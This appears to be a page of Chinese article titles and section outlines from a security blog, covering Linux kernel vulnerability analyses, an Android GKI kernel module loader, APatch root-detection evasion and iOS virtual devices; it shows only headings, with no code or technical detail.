从CopyFail到CopyFail2

xfrm-ESP漏洞原理

ESP路径代码块解析

RxRPC漏洞原理

RxRPC路径代码块解析

两条链为什么能通杀

补丁与缓解

总结

参考资料

安卓GKI内核KPM加载器开发踩坑实战

安卓GKI内核KPM加载器开发踩坑实战

目录

1 问题起点与ELF边界

ELF类型和转换边界

so不能直接转ko的原因

2 内核模块加载链路

加载前校验与架构段处理

符号解析、重定位与初始化

CRC版本校验

3 离线转换流水线

段、符号与重定位

转换经验总结

4 安卓GKI安全机制适配

目标设备与初始现象

SELinux与vermagic

BTI、PAC与SCS

CFI与厂商驱动兼容

GKI适配经验总结

5 KPM加载器运行时实现

设计目标与运行时基础

内存权限与符号可见性

重定位引擎

CFI、BTI与异构代码边界

运行期资源管理

GOT、外部符号与地址层级

符号表维护

6 全文总结

APatch最新版检测与过检测原理分析

APatch最新版检测与过检测原理分析

Duck-Detector的检测逻辑

官方补丁的过检测思路

过检测效果分析

结论

最新通杀全线Linux发行版的CVE漏洞解析

最新通杀全线Linux发行版的CVE漏洞解析

背景

原理分析

电子书更新分享：Linux内核模块编程指南.pdf

iOS虚拟手机实现能力现状

iOS虚拟手机实现能力现状

1 分析基线

2 项目变化

3 项目仓库结构

4 四种固件变体